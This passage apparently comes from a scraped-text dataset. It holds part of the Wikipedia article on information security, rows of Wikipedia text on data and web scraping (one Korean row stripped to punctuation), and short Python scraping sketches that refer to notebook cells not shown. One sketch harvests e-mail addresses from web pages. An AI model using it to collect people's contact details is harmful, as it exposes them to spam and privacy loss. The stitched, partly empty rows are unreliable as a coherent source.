information. 158 The information must be protected while in motion and while at rest. During its lifetime, information may pass through many different information processing systems and through many different parts of information processing systems. 159 There are many different ways the information and information systems can be threatened. To fully protect the information during its lifetime, each component of the information processing system must have its own protection mechanisms. 160 The building up, layering on, and overlapping of security measures is called "defense in depth. 161 In contrast to a metal chain, which is famously only as strong as its weakest link, the defense in depth strategy aims at a structure where, should one defensive measure fail, other measures will continue to provide protection. 162 Recall the earlier discussion about administrative controls, logical controls, and physical controls. The three types of controls can be used to form the basis upon which to build a defense in depth strategy. 144 With this approach, defense in depth can be conceptualized as three distinct layers or planes laid one on top of the other. 163 Additional insight into defense in depth can be gained by thinking of it as forming the layers of an onion, with data at the core of the onion, people the next outer layer of the onion, and network security, host-based security, and application security forming the outermost layers of the onion. 
164 Both perspectives are equally valid, and each provides valuable insight into the implementation of a good defense in depth strategy. 165 An important aspect of information security and risk management is recognizing the value of information and defining appropriate procedures and protection requirements for the information. 166 Not all information is equal and so not all information requires the same degree of protection. 167 This requires information to be assigned a security classification. 168 The first step in information classification is to identify a member of senior management as the owner of the particular information to be classified. Next, develop a classification policy. 169 The policy should describe the different classification labels, define the criteria for information to be assigned a particular label, and list the required security controls for each classification. 170 Some factors that influence which classification information should be assigned include how much value that information has to the organization, how old the information is and whether or not the information has become obsolete. 171 Laws and other regulatory requirements are also important considerations when classifying information. 172 The Information Systems Audit and Control Association (ISACA) and its Business Model for Information Security also serves as a tool for security professionals to examine security from a systems perspective, creating an environment where security can be managed holistically, allowing actual risks to be addressed. 173 The type of information security classification labels selected and used will depend on the nature of the organization, with examples being: 170 All employees in the organization, as well as business partners, must be trained on the classification schema and understand the required security controls and handling procedures for each classification. 176 The classification of a particular information asset that has been assigned should be reviewed periodically to ensure the classification is still appropriate for the information and to ensure the security controls required by the classification are in place and are followed in their right procedures. 177 Access to protected information must be restricted to people who are authorized to access the information. 178 The computer programs, and in many cases the computers that process the information, must also be authorized. 179 This requires that mechanisms be in place to control the access to protected information. 179 The sophistication of the access control mechanisms should be in parity with the value of the information being protected; the more sensitive or valuable the information the stronger the control mechanisms need to be. 180 The foundation on which access control mechanisms are built start with identification and authentication. 181 Access control is generally considered in three steps: identification, authentication, and authorization. 182 94 Identification is an assertion of who someone is or what something is. If a person makes the statement "Hello, my name is John Doe" they are making a claim of who they are. 183 However, their claim may or may not be true. Before John Doe can be granted access to protected information it will be necessary to verify that the person claiming to be John Doe really is John Doe. 184 Typically the claim is in the form of a username. By entering that username you are claiming "I am the person the username belongs to". 
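The three access-control steps named above, identification, authentication, and authorization, can be shown end to end in a few lines. This is a minimal sketch rather than a recommended design: the user record, role table, and password are invented, and a real system would add a proper user store, password policy, and rate limiting.

import hashlib
import hmac
import os

# One made-up user record: a username (identification), a salted password hash
# (authentication), and a role used for authorization.
_salt = os.urandom(16)
USERS = {
    "jdoe": {
        "password_hash": hashlib.pbkdf2_hmac("sha256", b"correct horse", _salt, 100_000),
        "salt": _salt,
        "role": "analyst",
    }
}
ROLE_PERMISSIONS = {"analyst": {"read"}, "admin": {"read", "write", "delete"}}

def authenticate(username, password):
    # Identification is only a claim ("I am jdoe") until the password verifies it.
    record = USERS.get(username)
    if record is None:
        return None
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), record["salt"], 100_000)
    return record if hmac.compare_digest(candidate, record["password_hash"]) else None

def authorize(record, action):
    # Authorization: check the authenticated user's role against the requested action.
    return action in ROLE_PERMISSIONS.get(record["role"], set())

user = authenticate("jdoe", "correct horse")
if user:
    print("read allowed: ", authorize(user, "read"))
    print("delete allowed:", authorize(user, "delete"))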
185 Authentication is the act of verifying a claim of identity. When John Doe goes into a bank to make a withdrawal, he tells the bank teller he is John Doe, a claim of identity. 186 The bank teller asks to see a photo ID, so he hands the teller his driver's license. 187 The bank teller checks the license to make sure it has John Doe printed on it and compares the photograph on the license against the person claiming to be John Doe. 188 If the photo and name match the person, then the teller has authenticated that John Doe is who he claimed to be. Similarly, by entering the correct password, the user is providing evidence that he she is the person the username belongs to. 189 There are three different types of information that can be used for authentication: 190 191 Strong authentication requires providing more than one type of authentication information (two-factor authentication). 197 The username is the most common form of identification on computer systems today and the password is the most common form of authentication. 198 Usernames and passwords have served their purpose, but they are increasingly inadequate. 199 Usernames and passwords are slowly being replaced or supplemented with more sophisticated authentication mechanisms such as time-based one-time password algorithms. 200 After a person, program or computer has successfully been identified and authenticated then it must be determined what informational resources they are permitted to access and what actions they will be allowed to perform (run, view, create, delete, or change). 201 This is called authorization. Authorization to access information and other computing services begins with administrative policies and procedures. 202 The policies prescribe what information and computing services can be accessed, by whom, and under what conditions. The access control mechanisms are then configured to enforce these policies. 203 Different computing systems are equipped with different kinds of access control mechanisms. Some may even offer a choice of different access control mechanisms. 204 The access control mechanism a system offers will be based upon one of three approaches to access control, or it may be derived from a combination of the three approaches. 94 The non-discretionary approach consolidates all access control under a centralized administration. 205 The access to information and other resources is usually based on the individuals function (role) in the organization or the tasks the individual must perform. 206 207 The discretionary approach gives the creator or owner of the information resource the ability to control access to those resources. 205 In the mandatory access control approach, access is granted or denied basing upon the security classification assigned to the information resource. 178 Examples of common access control mechanisms in use today include role-based access control, available in many advanced database management systems; simple file permissions provided in the UNIX and Windows operating systems; 208 Group Policy Objects provided in Windows network systems; and Kerberos, RADIUS, TACACS, and the simple access lists used in many firewalls and routers. 209 To be effective, policies and other security controls must be enforceable and upheld. Effective policies ensure that people are held accountable for their actions. 210 The U.S. 
Treasury's guidelines for systems processing sensitive or proprietary information, for example, state that all failed and successful authentication and access attempts must be logged, and all access to information must leave some type of audit trail. 211 Also, the need-to-know principle needs to be in effect when talking about access control. This principle gives access rights to a person to perform their job functions. 212 This principle is used in the government when dealing with different clearances. 213 Even though two employees in different departments have a top-secret clearance, they must have a need-to-know in order for information to be exchanged. Within the need-to-know principle, network administrators grant the employee the least amount of privilege to prevent employees from accessing more than what they are supposed to. 214 Need-to-know helps to enforce the confidentiality-integrity-availability triad. Need-to-know directly impacts the confidentiality area of the triad. 215 Information security uses cryptography to transform usable information into a form that renders it unusable by anyone other than an authorized user; this process is called encryption. 216 Information that has been encrypted (rendered unusable) can be transformed back into its original usable form by an authorized user who possesses the cryptographic key, through the process of decryption. 217 Cryptography is used in information security to protect information from unauthorized or accidental disclosure while the information is in transit (either electronically or physically) and while information is in storage. 94 Cryptography provides information security with other useful applications as well, including improved authentication methods, message digests, digital signatures, non-repudiation, and encrypted network communications. 218 Older, less secure applications such as Telnet and File Transfer Protocol (FTP) are slowly being replaced with more secure applications such as Secure Shell (SSH) that use encrypted network communications. 219 Wireless communications can be encrypted using protocols such as WPA/WPA2 or the older (and less secure) WEP. Wired communications (such as ITU-T G.hn) are secured using AES for encryption and X.1035 for authentication and key exchange. 220 Software applications such as GnuPG or PGP can be used to encrypt data files and email. 221 Cryptography can introduce security problems when it is not implemented correctly. 222 Cryptographic solutions need to be implemented using industry-accepted solutions that have undergone rigorous peer review by independent experts in cryptography. 223 The length and strength of the encryption key are also an important consideration. 224 A key that is weak or too short will produce weak encryption. 224 The keys used for encryption and decryption must be protected with the same degree of rigor as any other confidential information. 225 They must be protected from unauthorized disclosure and destruction, and they must be available when needed. Public key infrastructure (PKI) solutions address many of the problems that surround key management. 94 The terms "reasonable and prudent person", "due care", and "due diligence" have been used in the fields of finance, securities, and law for many years. In recent years these terms have found their way into the fields of computing and information security. 129 U.S. 
Federal Sentencing Guidelines now make it possible to hold corporate officers liable for failing to exercise due care and due diligence in the management of their information systems. 226 In the business world, stockholders, customers, business partners, and governments have the expectation that corporate officers will run the business in accordance with accepted business practices and in compliance with laws and other regulatory requirements. This is often described as the "reasonable and prudent person" rule. A prudent person takes due care to ensure that everything necessary is done to operate the business by sound business principles and in a legal, ethical manner. A prudent person is also diligent (mindful, attentive, ongoing) in their due care of the business. In the field of information security, Harris 227 offers the following definitions of due care and due diligence: due care comprises the "steps that are taken to show that a company has taken responsibility for the activities that take place within the corporation and has taken the necessary steps to help protect the company, its resources, and employees", 228 and due diligence comprises the "continual activities that make sure the protection mechanisms are continually maintained and operational". 229 Attention should be paid to two important points in these definitions. 230 231 First, in due care, steps are taken to show; this means that the steps can be verified, measured, or even produce tangible artifacts. 232 233 Second, in due diligence, there are continual activities; this means that people are actually doing things to monitor and maintain the protection mechanisms, and these activities are ongoing. 234 Organizations have a responsibility to practice duty of care when applying information security. The Duty of Care Risk Analysis Standard (DoCRA) 235 provides principles and practices for evaluating risk. 236 It considers all parties that could be affected by those risks. 237 DoCRA helps evaluate whether safeguards are appropriate for protecting others from harm while presenting a reasonable burden. 238 With increased data breach litigation, companies must balance security controls, compliance, and their mission. 239 The Software Engineering Institute at Carnegie Mellon University, in a publication titled Governing for Enterprise Security (GES) Implementation Guide, defines characteristics of effective security governance. These include: 240 An incident response plan (IRP) is a group of policies that dictate an organization's reaction to a cyber attack. Once a security breach has been identified, for example by a network intrusion detection system (NIDS) or a host-based intrusion detection system (HIDS) (if configured to do so), the plan is initiated. 241 It is important to note that there can be legal implications to a data breach. Knowing local and federal laws is critical. 242 Every plan is unique to the needs of the organization, and it can involve skill sets that are not part of an IT team. 243 For example, a lawyer may be included in the response plan to help navigate the legal implications of a data breach. As mentioned above, every plan is unique, but most plans will include the following: 244 Good preparation includes the development of an incident response team (IRT). 245 Skills needed by this team include penetration testing, computer forensics, network security, and so on. 246 This team should also keep track of trends in cybersecurity and modern attack strategies. 
247 A training program for end users is important as well as most modern attack strategies target users on the network. 244 This part of the incident response plan identifies if there was a security event. 248 When an end user reports information or an admin notices irregularities, an investigation is launched. An incident log is a crucial part of this step. citation needed All of the members of the team should be updating this log to ensure that information flows as fast as possible. 249 If it has been identified that a security breach has occurred the next step should be activated. 250 In this phase, the IRT works to isolate the areas that the breach took place to limit the scope of the security event. 251 During this phase it is important to preserve information forensically so it can be analyzed later in the process. 252 Containment could be as simple as physically containing a server room or as complex as segmenting a network to not allow the spread of a virus. 253 This is where the threat that was identified is removed from the affected systems. 254 This could include deleting malicious files, terminating compromised accounts, or deleting other components. 255 256 Some events do not require this step, however it is important to fully understand the event before moving to this step. 257 This will help to ensure that the threat is completely removed. 253 This stage is where the systems are restored back to original operation. 258 This stage could include the recovery of data, changing user access information, or updating firewall rules or policies to prevent a breach in the future. 259 260 Without executing this step, the system could still be vulnerable to future security threats. 253 In this step information that has been gathered during this process is used to make future decisions on security. 261 This step is crucial to the ensure that future events are prevented. Using this information to further train admins is critical to the process. 262 This step can also be used to process information that is distributed from other entities who have experienced a security event. 263 Change management is a formal process for directing and controlling alterations to the information processing environment. 264 265 This includes alterations to desktop computers, the network, servers, and software. 266 The objectives of change management are to reduce the risks posed by changes to the information processing environment and improve the stability and reliability of the processing environment as changes are made. 267 It is not the objective of change management to prevent or hinder necessary changes from being implemented. 268 269 Any change to the information processing environment introduces an element of risk. 270 Even apparently simple changes can have unexpected effects. 271 One of management's many responsibilities is the management of risk. 272 273 Change management is a tool for managing the risks introduced by changes to the information processing environment. 274 Part of the change management process ensures that changes are not implemented at inopportune times when they may disrupt critical business processes or interfere with other changes being implemented. 275 Not every change needs to be managed. 276 277 Some kinds of changes are a part of the everyday routine of information processing and adhere to a predefined procedure, which reduces the overall level of risk to the processing environment. 
278 Creating a new user account or deploying a new desktop computer are examples of changes that do not generally require change management. 279 However, relocating user file shares, or upgrading the Email server pose a much higher level of risk to the processing environment and are not a normal everyday activity. 280 The critical first steps in change management are (a) defining change (and communicating that definition) and (b) defining the scope of the change system. 281 Change management is usually overseen by a change review board composed of representatives from key business areas, 282 security, networking, systems administrators, database administration, application developers, desktop support, and the help desk. 283 The tasks of the change review board can be facilitated with the use of automated work flow application. 284 The responsibility of the change review board is to ensure the organization's documented change management procedures are followed. 285 The change management process is as follows 286 Change management procedures that are simple to follow and easy to use can greatly reduce the overall risks created when changes are made to the information processing environment. 318 Good change management procedures improve the overall quality and success of changes as they are implemented. 319 This is accomplished through planning, peer review, documentation, and communication. 320 ISO IEC 20000, The Visible OPS Handbook: Implementing ITIL in 4 Practical and Auditable Steps 321 (Full book summary), 322 and ITIL all provide valuable guidance on implementing an efficient and effective change management program information security. 323 Business continuity management (BCM) concerns arrangements aiming to protect an organization's critical business functions from interruption due to incidents, or at least minimize the effects. 324 325 BCM is essential to any organization to keep technology and business in line with current threats to the continuation of business as usual. 326 The BCM should be included in an organizations risk analysis plan to ensure that all of the necessary business functions have what they need to keep going in the event of any type of threat to any business function. 327 It encompasses: Whereas BCM takes a broad approach to minimizing disaster-related risks by reducing both the probability and the severity of incidents, a disaster recovery plan (DRP) focuses specifically on resuming business operations as quickly as possible after a disaster. 337 A disaster recovery plan, invoked soon after a disaster occurs, lays out the steps necessary to recover critical information and communications technology (ICT) infrastructure. 338 Disaster recovery planning includes establishing a planning group, performing risk assessment, establishing priorities, developing recovery strategies, preparing inventories and documentation of the plan, developing verification criteria and procedure, and lastly implementing the plan. 339 Below is a partial listing of governmental laws and regulations in various parts of the world that have, had, or will have, a significant effect on data processing and information security. 340 341 Important industry sector regulations have also been included when they have a significant impact on information security. 
340 The US Department of Defense (DoD) issued DoD Directive 8570 in 2004, supplemented by DoD Directive 8140, requiring all DoD employees and all DoD contract personnel involved in information assurance roles and activities to earn and maintain various industry Information Technology (IT) certifications in an effort to ensure that all DoD personnel involved in network infrastructure defense have minimum levels of IT industry-recognized knowledge, skills and abilities (KSA). Andersson and Reimers (2019) report these certifications range from CompTIA's A+ and Security+ through ISC2.org's CISSP, etc. 376 Describing more than simply how security-aware employees are, information security culture is the ideas, customs, and social behaviors of an organization that impact information security in both positive and negative ways. 377 Cultural concepts can help different segments of the organization work effectively or work against effectiveness towards information security within an organization. The way employees think and feel about security and the actions they take can have a big impact on information security in organizations. Roer & Petric (2017) identify seven core dimensions of information security culture in organizations: 378 Andersson and Reimers (2014) found that employees often do not see themselves as part of the organization's information security "effort" and often take actions that ignore organizational information security best interests. 380 Research shows information security culture needs to be improved continuously. In Information Security Culture from Analysis to Change, the authors commented, "It's a never ending process, a cycle of evaluation and change or maintenance." To manage the information security culture, five steps should be taken: pre-evaluation, strategic planning, operative planning, implementation, and post-evaluation. 381 The International Organization for Standardization (ISO) is an international standards organization organized as a consortium of national standards institutions from 167 countries, coordinated through a secretariat in Geneva, Switzerland. ISO is the world's largest developer of international standards. The International Electrotechnical Commission (IEC) is an international standards organization that deals with electrotechnology and cooperates closely with ISO. ISO/IEC 15443: "Information technology Security techniques A framework for IT security assurance", ISO/IEC 27002: "Information technology Security techniques Code of practice for information security management", ISO/IEC 20000: "Information technology Service management", and ISO/IEC 27001: "Information technology Security techniques Information security management systems Requirements" are of particular interest to information security professionals. The US National Institute of Standards and Technology (NIST) is a non-regulatory federal agency within the U.S. Department of Commerce. The NIST Computer Security Division develops standards, metrics, tests, and validation programs as well as publishes standards and guidelines to increase secure IT planning, implementation, management, and operation. NIST is also the custodian of the U.S. Federal Information Processing Standard publications (FIPS). The Internet Society is a professional membership society with more than 100 organizations and over 20,000 individual members in over 180 countries. 
It provides leadership in addressing issues that confront the future of the internet, and it is the organizational home for the groups responsible for internet infrastructure standards, including the Internet Engineering Task Force (IETF) and the Internet Architecture Board (IAB). The ISOC hosts the Requests for Comments (RFCs), which include the Official Internet Protocol Standards and the RFC 2196 Site Security Handbook. The Information Security Forum (ISF) is a global nonprofit organization of several hundred leading organizations in financial services, manufacturing, telecommunications, consumer goods, government, and other areas. It undertakes research into information security practices and offers advice in its biannual Standard of Good Practice for Information Security and more detailed advisories for members. The Institute of Information Security Professionals (IISP) is an independent, non-profit body governed by its members, with the principal objective of advancing the professionalism of information security practitioners and thereby the professionalism of the industry as a whole. The institute developed the IISP Skills Framework. This framework describes the range of competencies expected of information security and information assurance professionals in the effective performance of their roles. It was developed through collaboration between both private and public sector organizations, world-renowned academics, and security leaders. 382 The German Federal Office for Information Security (in German, Bundesamt für Sicherheit in der Informationstechnik (BSI)) publishes the BSI-Standards 100-1 to 100-4, a set of recommendations including "methods, processes, procedures, approaches and measures relating to information security". 383 The BSI-Standard 100-2 IT-Grundschutz Methodology describes how information security management can be implemented and operated. The standard includes a very specific guide, the IT Baseline Protection Catalogs (also known as IT-Grundschutz Catalogs). Before 2005, the catalogs were known as the "IT Baseline Protection Manual". The Catalogs are a collection of documents useful for detecting and combating security-relevant weak points in the IT environment (IT cluster). As of September 2013, the collection encompasses over 4,400 pages, including the introduction and catalogs. The IT-Grundschutz approach is aligned with the ISO/IEC 2700x family. The European Telecommunications Standards Institute standardized a catalog of information security indicators, headed by the Industrial Specification Group (ISG) ISI. |
324 | https://en.wikipedia.org/wiki/Web_scraping | https://ko.wikipedia.org/wiki/%EC%9B%B9_%EC%8A%A4%ED%81%AC%EB%9E%98%ED%95%91 | [Korean-language Wikipedia article on web scraping; the Hangul text was stripped by the character filter, leaving only punctuation and the Latin fragments "web scraping", "web harvesting", "web data extraction", HTTP, URL, HTML/XHTML, JSON, and DOM, so no readable content survives.] |
325 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/w/index.php?title=Data_scraping&printable=yes | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. 
Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today, for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50-year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise (e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management), could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24×80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data into numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX/VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined, in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 
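As a concrete sketch of the "listening to JSON data feeds" idea above, the snippet below fetches a feed with the requests and pandas libraries already imported in this notebook; the endpoint URL and the field layout are hypothetical placeholders, not a documented API.
import requests
import pandas as pd

# Hypothetical JSON endpoint; substitute the real feed you are scraping.
FEED_URL = "https://example.com/api/listings.json"

def scrape_json_feed(url: str) -> pd.DataFrame:
    """Fetch a JSON feed and flatten it into a DataFrame for later analysis."""
    response = requests.get(url, timeout=30)
    response.raise_for_status()   # fail loudly on HTTP errors
    records = response.json()     # assumed shape: a list of flat dicts
    return pd.DataFrame(records)

# df = scrape_json_feed(FEED_URL)
# df.to_csv("listings.csv", index=False)   # store the data for subsequent analysis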
7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
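A minimal report-mining sketch in the spirit of this notebook: rows are pulled out of a plain-text spool report with a regular expression and loaded into pandas. The report path and the fixed column layout are assumptions for illustration only.
import re
import pandas as pd

# Hypothetical spool file produced by "print to file" from a legacy system.
REPORT_PATH = "monthly_sales_report.txt"

# Assumed fixed layout per line: "2024-05-01   WIDGET-42   1,250.00"
ROW_PATTERN = re.compile(r"(\d{4}-\d{2}-\d{2})\s+(\S+)\s+([\d,]+\.\d{2})")

def mine_report(path: str) -> pd.DataFrame:
    """Extract (date, item, amount) rows from a human-readable text report."""
    rows = []
    with open(path, encoding="utf-8") as fh:
        for line in fh:
            match = ROW_PATTERN.search(line)
            if match:
                date, item, amount = match.groups()
                rows.append({"date": date, "item": item,
                             "amount": float(amount.replace(",", ""))})
    return pd.DataFrame(rows)

# df = mine_report(REPORT_PATH)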
326 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-7 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting data from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing. Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
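The fetch-then-extract workflow described above maps directly onto the requests, BeautifulSoup, and pandas imports used earlier in this notebook. The sketch below is illustrative only; the target URL and the CSS selectors are hypothetical.
import requests
import pandas as pd
from bs4 import BeautifulSoup

# Hypothetical page to scrape; replace with a real target.
PAGE_URL = "https://example.com/products"

def fetch_and_extract(url: str) -> pd.DataFrame:
    """Fetch a page (the crawling step), then parse it and copy data out of it."""
    html = requests.get(url, timeout=30).text
    soup = BeautifulSoup(html, "html5lib")        # html5lib is installed at the top of this notebook
    rows = []
    for item in soup.select("div.product"):       # assumed markup: <div class="product">...</div>
        name = item.select_one("h2")
        price = item.select_one("span.price")
        if name and price:
            rows.append({"name": name.get_text(strip=True),
                         "price": price.get_text(strip=True)})
    return pd.DataFrame(rows)

# fetch_and_extract(PAGE_URL).to_csv("products.csv", index=False)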
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a common URL scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as XPath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quickly it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Some newer systems use advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
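A short sketch of the two approaches just described, grep-style regular-expression matching and XPath queries over a DOM tree. The lxml dependency is an assumption (it is not installed in the cells above), and the URL and patterns are placeholders.
import re
import requests
from lxml import html   # assumed extra dependency: pip install lxml

PAGE_URL = "https://example.com/listings"   # hypothetical target
page_source = requests.get(PAGE_URL, timeout=30).text

# 1) grep-style extraction: pull every e-mail-like string out of the raw HTML.
emails = re.findall(r"[\w.+-]+@[\w-]+\.[\w.-]+", page_source)

# 2) DOM/XPath extraction: parse the page and query it structurally.
tree = html.fromstring(page_source)
titles = tree.xpath("//h2[@class='title']/text()")   # assumed markup

print(f"Found {len(emails)} e-mail addresses and {len(titles)} titles")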
